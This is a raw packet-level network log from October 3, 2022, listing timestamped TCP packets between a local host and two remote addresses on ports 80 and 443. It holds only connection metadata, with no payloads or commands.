Oct 3, 2022 17:42:37.069283009 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069310904 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.069310904 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.069314003 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069343090 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.069348097 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069390059 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069401026 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.069422960 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069454908 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069468975 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.069488049 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069533110 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069542885 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.069565058 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069567919 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.069597960 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069631100 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069672108 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069704056 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069730043 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.069735050 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069767952 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069809914 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069818974 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.069840908 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069871902 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069884062 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.069904089 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069945097 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069955111 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.069977999 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.070007086 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.070007086 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.070024967 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.070051908 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.070082903 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.070084095 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.070118904 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.070149899 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.070151091 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.070178986 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.070183039 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.070205927 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.070215940 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.070229053 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.070250034 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.070281029 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.070291996 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.070313931 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.070353985 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.070370913 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.070396900 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.070420027 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.070425034 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.070451975 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.070483923 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.070487022 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.070516109 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.070539951 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.070547104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.070580959 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.070601940 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.070601940 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.070635080 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.070960999 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.070960999 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.080511093 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.086129904 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.087842941 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.097945929 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.097989082 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098041058 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098064899 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098117113 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098149061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098181009 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098186016 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.098212957 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098258972 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098259926 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.098261118 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.098290920 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098334074 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098366022 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098397970 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098402023 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.098428965 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098460913 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098460913 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.098494053 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098526001 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098536968 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.098557949 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098603964 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098620892 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.098637104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098679066 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098685980 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.098711967 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098753929 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098766088 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.098786116 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098814964 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.098835945 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098864079 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098898888 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098923922 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.098941088 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.098973989 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099004984 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099035978 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099076033 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099085093 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.099112034 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099143028 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099143028 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.099174976 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099215984 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099224091 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.099250078 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099289894 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099303961 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.099322081 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099344015 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.099363089 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099394083 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099432945 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099464893 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099508047 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099514008 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.099539995 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099581003 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099591017 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.099611998 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099653006 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099662066 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.099694967 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099710941 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.099726915 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099759102 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099767923 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.099790096 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099817991 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.099822044 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099843979 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.099854946 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099886894 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099917889 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099927902 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.099950075 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.099972010 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.099982023 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.100014925 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.100038052 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.100047112 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.100080013 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.100120068 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.100131035 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.100152969 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.100183964 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.100195885 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.100215912 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.100249052 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.100269079 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.100296974 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.100508928 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.100866079 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.100902081 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.100934029 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.100965977 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.101006985 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.101066113 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.101119041 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.101183891 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.101217031 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.101259947 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.101291895 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.101332903 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.101365089 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.101404905 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.101414919 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.101437092 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.101479053 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.101488113 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.101512909 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.101538897 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.101540089 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.101572990 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.101600885 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.101600885 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.101604939 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.101636887 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.101639986 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.101639986 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.101670980 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.101706982 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.102001905 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.104480028 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.104480028 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.115154028 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.116233110 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.127573967 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.127616882 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.127674103 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.127707958 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.127732038 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.127739906 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.127785921 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.127809048 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.127820015 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.127839088 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.127854109 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.127896070 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.127912998 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.127929926 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.127959967 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.127963066 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.127996922 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128015995 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.128027916 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128071070 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128087997 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.128104925 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128134012 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.128139973 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128171921 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128204107 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128215075 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.128236055 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128268957 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128287077 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.128300905 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128312111 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.128334999 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128376961 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128410101 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128437042 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.128454924 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128501892 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128535032 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128576040 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128595114 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.128607988 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128640890 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128664017 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.128674030 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128693104 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.128706932 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128748894 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128761053 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.128782988 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128815889 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128848076 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128880024 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128921986 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128945112 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.128945112 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.128945112 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.128945112 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.128953934 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.128997087 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129003048 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.129030943 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129062891 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129071951 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.129095078 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129137039 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129143000 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.129169941 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129210949 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129215956 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.129242897 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129285097 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129292965 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.129317999 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129350901 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129355907 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.129383087 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129415035 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.129415989 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129451990 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129475117 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.129483938 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129518032 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129559994 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129564047 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.129592896 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129623890 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.129625082 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129657030 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129683018 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.129688978 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129720926 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129745007 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.129753113 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129786968 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129801989 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.129817963 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129863024 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129894972 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129901886 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.129926920 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129959106 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129992008 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.129997969 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.130023956 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.130057096 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.130088091 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.130093098 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.130093098 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.130120993 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.130152941 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.130160093 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.130191088 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.130214930 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.130218983 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.130278111 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.133306026 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:42.104644060 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:42.104788065 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:43:01.291497946 CEST	49712	443	192.168.2.6	148.251.234.83
Oct 3, 2022 17:43:01.291558981 CEST	443	49712	148.251.234.83	192.168.2.6
Oct 3, 2022 17:43:01.291686058 CEST	49712	443	192.168.2.6	148.251.234.83
Oct 3, 2022 17:43:01.352962017 CEST	49712	443	192.168.2.6	148.251.234.83
Oct 3, 2022 17:43:01.353023052 CEST	443	49712	148.251.234.83	192.168.2.6
Oct 3, 2022 17:43:01.438170910 CEST	443	49712	148.251.234.83	192.168.2.6
Oct 3, 2022 17:43:01.438405991 CEST	49712	443	192.168.2.6	148.251.234.83
Oct 3, 2022 17:43:01.448036909 CEST	49712	443	192.168.2.6	148.251.234.83
Oct 3, 2022 17:43:01.448064089 CEST	443	49712	148.251.234.83	192.168.2.6
Oct 3, 2022 17:43:01.448345900 CEST	443	49712	148.251.234.83	192.168.2.6
Oct 3, 2022 17:43:01.498286963 CEST	49712	443	192.168.2.6	148.251.234.83
Oct 3, 2022 17:43:01.931112051 CEST	49712	443	192.168.2.6	148.251.234.83
